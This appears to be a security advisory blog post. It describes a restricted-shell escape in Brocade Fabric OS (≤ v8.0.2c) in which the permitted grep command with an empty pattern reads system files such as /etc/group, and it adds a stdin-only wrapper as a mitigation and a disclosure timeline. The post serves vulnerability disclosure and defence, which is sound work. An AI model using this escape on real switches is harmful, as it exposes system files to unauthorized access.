Brocade Fabric OS ≤ v8.0.2c rbash escape to read system files
Broadcom offers a number of products and networking solutions such as switches, extensions etc. These products come with their own operating system, Fabric OS. It is a lightweight OS: upon logging in through ssh or telnet, the user lands in the restricted environment of rbash. The user is not able to execute any of the usual system commands, such as ls, echo, cd, cat, etc., but only some custom commands the developers have made available themselves, e.g.
...
iflshow Display edge switch FCR connection information
interfaceshow Display the FSPF (TM) interface information
iodset Manage the in-order delivery (IOD) option
iodshow Display the state of the in-order delivery option
ipaddrset Set ethernet and FC IP addresses
ipaddrshow Print ethernet and FC IP addresses
islshow Display the current connections and status
...
One of the available commands is the classic system command grep. The system also allows pipelines (|), which explains why grep is allowed:
HOSTNAME:user> ipaddrshow
SWITCH
Ethernet IP Address: 10.115.76.184
Ethernet Subnetmask: 255.255.254.0
Gateway IP Address: 10.115.76.251
DHCP: Off
HOSTNAME:user> ipaddrshow |grep Gateway
Gateway IP Address: 10.115.76.251
HOSTNAME:user>
By leaving grep available, one can read underlying system files by searching for the empty pattern '', which matches every line, so grep prints the whole file. The files one has access to depend on the authenticated user's privileges.
HOSTNAME:user> cat /etc/group
rbash: cat: command not found
HOSTNAME:user> ls /etc/group
rbash: ls: command not found
HOSTNAME:user> grep '' /etc/group
root::0:root
sys::3:root,bin
smmsp::25:smmsp
nobody::99:
users::100:
utmp:x:102:
admin::600:admin,root
user::602:user,admin,root
switchadmin::604:
operator::605:
zoneadmin::606:
fabricadmin::607:
basicswitchadmin::608:
securityadmin::609:
udrole::550:
HOSTNAME:user>
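One way to keep pipeline filtering without the file read shown above is to expose a stdin-only wrapper in place of grep. The following is an added example, not Fabric OS code and not Broadcom's fix; the name pipe_grep, the flag allowlist and the sample input are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not Fabric OS code): a stdin-only grep for a restricted shell.
# pipe_grep is a hypothetical name; the flag allowlist is an assumption.

pipe_grep() {
    opts=""
    pattern=""
    have_pattern=0
    while [ "$#" -gt 0 ]; do
        case "$1" in
            -i|-v|-c|-n|-w|-x|-E|-F)
                # Allowlisted flags: none takes an argument or names a file.
                opts="$opts $1" ;;
            -*)
                # Refuses -f FILE, -r/-R, --file=..., "--", bundled flags, etc.
                echo "pipe_grep: option not permitted: $1" >&2
                return 2 ;;
            *)
                if [ "$have_pattern" -eq 1 ]; then
                    # A second operand would be a file name for grep to open.
                    echo "pipe_grep: file operands are not permitted" >&2
                    return 2
                fi
                pattern=$1
                have_pattern=1 ;;
        esac
        shift
    done
    if [ "$have_pattern" -ne 1 ]; then
        echo "usage: <command> | pipe_grep [-ivcnwxEF] PATTERN" >&2
        return 2
    fi
    # No file operand reaches grep, so it can only read standard input.
    # $opts is deliberately unquoted: it holds only allowlisted flags.
    grep $opts -e "$pattern"
}

# Constructed sample output standing in for a switch command.
sample='Gateway IP Address: 10.115.76.251
DHCP: Off'

printf '%s\n' "$sample" | pipe_grep Gateway      # filtering a pipeline works
pipe_grep '' /etc/group </dev/null || echo "refused (exit $?)"
```

The wrapper only helps if the restricted PATH exposes it and not the grep binary itself.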
The issue was discovered by Bitcrack during a penetration test for a client and reported to Broadcom's PSIRT. Broadcom's internal security audit had discovered it earlier this year and had scheduled a fix before Bitcrack notified them.
Timeline:
Reported to Broadcom's PSIRT: 26/9/2022
First response and redirecting us to Brocade SIRT: 26/9/2022
Second response letting us know of the found issue: 5/10/2022
Clarifications and ask for permission to post on our blog: 10/10/2022
No response from Broadcom, release of the article: 29/11/2022